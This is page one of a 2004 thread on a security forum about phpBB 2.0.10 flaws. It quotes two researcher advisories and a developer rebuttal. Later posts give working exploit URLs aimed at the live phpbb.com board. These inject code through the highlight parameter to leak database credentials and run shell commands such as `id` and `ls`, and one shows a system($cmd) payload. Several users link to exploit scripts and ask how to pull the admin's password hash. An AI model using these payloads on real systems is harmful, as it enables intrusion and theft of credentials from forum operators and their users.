Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 19, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 269
Members: 0
Total: 269
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> vulns in phpbb 2.0.10 Goto page 1, 2, 3, 4  Next
Post new topic  Reply to topic View previous topic :: View next topic 
vulns in phpbb 2.0.10
PostPosted: Mon Nov 15, 2004 5:56 pm Reply with quote
hebe
Advanced user
Advanced user
 
Joined: Sep 04, 2004
Posts: 59




Quote:
| | | | | _ \ | |
| |_| | _____ __ | | | |__ _ _ __| | __
| _ |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V V / | |/ / (_| | | | <
\_| |_/\___/ \_/\_/ |___/ \__,_|_| |_|\_\
http://www.howdark.com

----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------

Author: How Dark
Date: October 14, 2004
URL: http://www.howdark.com

Affected Software: phpBB 2
Software Version: 2.0.* - 2.0.10
Software URL: http://www.phpbb.com

Attack: SQL Injection, allowing people to minipulate the query into pulling data
they should not previously be able too obtain. (Such as passwords)

Description: Requiring the account be a moderator, or having a moderation session
with the correct cookie to actually execute this attack, it is not that big
of an issue, but it still is there.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------

Including a F (forum), with a MODE, but without a T (topic) leads to SQL error.
But because of topic turning all user input values into numbers, the injection is
useless, unless a way around this was found.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------

modcp.php?mode=[mode]&f=1&t=[SQL]&sid=[your mod session]

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Line: 801
----------------------------------------------------------------------------------------------------------------------------------

$sql = "SELECT u.username, p.*, pt.post_text, pt.bbcode_uid, pt.post_subject, p.post_username
FROM " . POSTS_TABLE . " p, " . USERS_TABLE . " u, " . POSTS_TEXT_TABLE . " pt
WHERE p.topic_id = $topic_id
AND p.poster_id = u.user_id
AND p.post_id = pt.post_id
ORDER BY p.post_time ASC";

----------------------------------------------------------------------------------------------------------------------------------
// Line: 806
----------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------
// SQL Error
----------------------------------------------------------------------------------------------------------------------------------

Could not get topic/post information

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND p.poster_id = u.user_id AND p.post_id = pt.post_id

SELECT u.username, p.*, pt.post_text, pt.bbcode_uid, pt.post_subject, p.post_username FROM htf_posts p, htf_users u, htf_posts_text pt WHERE p.topic_id = AND p.poster_id = u.user_id AND p.post_id = pt.post_id ORDER BY p.post_time ASC

Line : 809
File : modcp.php



2nd
Quote:
_ _ ______ _
| | | | | _ \ | |
| |_| | _____ __ | | | |__ _ _ __| | __
| _ |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V V / | |/ / (_| | | | <
\_| |_/\___/ \_/\_/ |___/ \__,_|_| |_|\_\
http://www.howdark.com

----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------

Author: How Dark
Date: October 1, 2004
URL: http://www.howdark.com

Affected Software: phpBB 2
Software Version: 2.0.* - 2.0.10
Software URL: http://www.phpbb.com

Attack: SQL Injection, allowing people to minipulate the query into pulling data
they should not previously be able too obtain. (Such as passwords)
Arbituary EXEC allows you, if you can get on to a new line, to execute
your own PHP, which can be fatal.

Description: Because of the way urldecode and magic quotes works,
it turns %2527 into %27, which is a single quote, and it
leaves it unslashed. This gives you a SQL Injection, leading
to arbituary PHP exec hole. But because you can't get outside
preg_replace because of magic quotes, this is very very useless.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------

Highlighting %2527 on any topic.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------

viewtopic.php?t=1&highlight=%2527

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Error
----------------------------------------------------------------------------------------------------------------------------------

Parse error: parse error, unexpected T_STRING in viewtopic.php(1109) : regexp code on line 1

Fatal error: Failed evaluating code: preg_replace('#\b(')\b#i', '\1', '>[POST TEXT HERE]<') in viewtopic.php on line 1109

---------------------------------------------------------------------------------------------------------


psoftx write that in the phpbb comunity
Code:
We've have had and continue to receive reports based on a bugtraq email submitted by the "howdark.com" group. Please do not report these issues to us, not by PM, email nor via our security tracker.

The two "sql injection" issues are not sql injection issues, nothing can be done with them at all due to type casting (strings are forced to an integer type). The group admit this themselves but persist in claiming they are sql injection issues. The "solution" they give contains semantically incorrect SQL (you do not enclose values for integer field types in quotes).

The third issue, search highlighting, has been checked by us several times and we can do nothing with it at all. Again, that particular group admit likewise. In a future release of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our knowledge and as noted, testing) be taken advantage of and thus is not considered by us to be cause for an immediate release.
View user's profile Send private message
PostPosted: Mon Nov 15, 2004 11:58 pm Reply with quote
jessica
Regular user
Regular user
 
Joined: Sep 18, 2004
Posts: 5




Quote:
-----------------------------------------------------------------------------------------------------
// Updates
-----------------------------------------------------------------------------------------------------

Just a note on the phpBB finds, they are NOT SQL Injection issues,
they are just poorly coded errors, as I had stated.

This is just immature of the phpBB Group to say we were presistant
about these, considering they were not submitted to BugTRAQ because
we knew for a fact they were useless.

The highlight error, as I stated is not harmful under the circumstances
of the default code, but if presented with minor changes, which is known
to some widely known phpBB Boards, they could present problems.

The highlight error is NOT, and I repeat NOT, SQL Injection, I am sorry
for the misworded presentation. I found this awhile ago, and I asked
a friend, who is well knowledged about these subjects, what to label
this with the options I had for the phpBB Security Tracker, and this is
what he gave me.

I did not check over what I sent, stupidly, and that is how it was sent out.
Sorry for the incovience

Keep note, that these would not even be on BugTRAQ if phpBB were
not immature about the bug reports I gave them, and they mildly ignored.
View user's profile Send private message Visit poster's website AIM Address
PostPosted: Wed Nov 17, 2004 2:30 pm Reply with quote
LINUX
Moderator
Moderator
 
Joined: May 24, 2004
Posts: 404
Location: Caiman




psoftx write that in the phpbb comunity
Code:
We've have had and continue to receive reports based on a bugtraq email submitted by the "howdark.com" group. Please do not report these issues to us, not by PM, email nor via our security tracker.

The two "sql injection" issues are not sql injection issues, nothing can be done with them at all due to type casting (strings are forced to an integer type). The group admit this themselves but persist in claiming they are sql injection issues. The "solution" they give contains semantically incorrect SQL (you do not enclose values for integer field types in quotes).

The third issue, search highlighting, has been checked by us several times and we can do nothing with it at all. Again, that particular group admit likewise. In a future release of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our knowledge and as noted, testing) be taken advantage of and thus is not considered by us to be cause for an immediate release.

----------------------------------

PHPBB developers read read read ERROR ERROR

WTF xD

Good work Jessica
View user's profile Send private message Visit poster's website
PostPosted: Thu Nov 18, 2004 1:47 am Reply with quote
jessica
Regular user
Regular user
 
Joined: Sep 18, 2004
Posts: 5




Just a note, look how they edit their post now that there's a proof of concept, this one of the most dangerous phpbb exploits ever.


Proof of Concept:

http://www.howdark.com/phpbb2010.phps
View user's profile Send private message Visit poster's website AIM Address
PostPosted: Thu Nov 18, 2004 7:17 am Reply with quote
hebe
Advanced user
Advanced user
 
Joined: Sep 04, 2004
Posts: 59




jessica wrote:
Just a note, look how they edit their post now that there's a proof of concept, this one of the most dangerous phpbb exploits ever.


Proof of Concept:

http://www.howdark.com/phpbb2010.phps

hahah they must patch now
and also these
1. "username" is $dbuser:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbuser.%2527

2. "username" is $dbpasswd:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbpasswd.%2527

3. "username" is $dbname:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbname.%2527

4. "username" is result of passthru("id"):
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=`id`.%2527
"username" is result of passthru("ls"):
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=`ls`.%2527
View user's profile Send private message
PostPosted: Thu Nov 18, 2004 8:03 am Reply with quote
LINUX
Moderator
Moderator
 
Joined: May 24, 2004
Posts: 404
Location: Caiman




OMG very nice Laughing Laughing Laughing Laughing Laughing
View user's profile Send private message Visit poster's website
PostPosted: Thu Nov 18, 2004 10:53 am Reply with quote
hebe
Advanced user
Advanced user
 
Joined: Sep 04, 2004
Posts: 59




jessica wrote:
Just a note, look how they edit their post now that there's a proof of concept, this one of the most dangerous phpbb exploits ever.


Proof of Concept:

http://www.howdark.com/phpbb2010.phps


this only works in win servers ?
"/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd.")%252e%2527";
cmd?
View user's profile Send private message
PostPosted: Thu Nov 18, 2004 1:05 pm Reply with quote
jessica
Regular user
Regular user
 
Joined: Sep 18, 2004
Posts: 5




no, it'll work on most os's

It'll just limit it to what OS it is.. i.e: unix is ls, and windows is dir.

It isn't very useful because you are logged in as no user, so you don't have write permission or anything, so you can read like config.php (cat config.php on unix) and you have to view the page source since config.php has <? ?> and the page parses it thinking it's html.

But other then that you are pretty much out of luck.

CMD Example Script is here:
http://www.howdark.com/exploit
View user's profile Send private message Visit poster's website AIM Address
PostPosted: Thu Nov 18, 2004 1:11 pm Reply with quote
jessica
Regular user
Regular user
 
Joined: Sep 18, 2004
Posts: 5




And just to think phpBB devs reported me to my ISP for trying to help them with this.

assholes.
View user's profile Send private message Visit poster's website AIM Address
PostPosted: Fri Nov 19, 2004 3:15 am Reply with quote
LINUX
Moderator
Moderator
 
Joined: May 24, 2004
Posts: 404
Location: Caiman




jessica you need host for exploits send pm Surprised
View user's profile Send private message Visit poster's website
PostPosted: Sun Nov 21, 2004 1:57 pm Reply with quote
sygma
Regular user
Regular user
 
Joined: Nov 21, 2004
Posts: 7




Quote:
&highlight=%2527.$poster=$dbname.%2527


is there a way i could make a SQL query and thus obtain the admin's hashed password ?

_________________
[i]no word to save thee[/i]
View user's profile Send private message
PostPosted: Sun Nov 21, 2004 10:14 pm Reply with quote
kranium
Regular user
Regular user
 
Joined: Jun 27, 2004
Posts: 7




sygma wrote:
Quote:
&highlight=%2527.$poster=$dbname.%2527


is there a way i could make a SQL query and thus obtain the admin's hashed password ?


yes i wish i could do that too. i used the exploit in http://www.howdark.com/exploit/ but everytime i try some SQL query it shows me NOTHING Sad any ideas?
View user's profile Send private message
PostPosted: Mon Nov 22, 2004 9:34 pm Reply with quote
SteX
Advanced user
Advanced user
 
Joined: May 18, 2004
Posts: 181
Location: Serbia




Dont work for me...

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
PostPosted: Tue Nov 23, 2004 3:59 am Reply with quote
LINUX
Moderator
Moderator
 
Joined: May 24, 2004
Posts: 404
Location: Caiman




SteX wrote:
Dont work for me...



what not work stex? i test work nice Laughing

exploit work in all phpbb forums 2.0.* - 2.0.10
View user's profile Send private message Visit poster's website
a
PostPosted: Tue Nov 23, 2004 2:33 pm Reply with quote
SteX
Advanced user
Advanced user
 
Joined: May 18, 2004
Posts: 181
Location: Serbia




What did you entered in SQL tab..?

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
View user's profile Send private message
vulns in phpbb 2.0.10
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 4  
Goto page 1, 2, 3, 4  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Game Hints
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.101 Seconds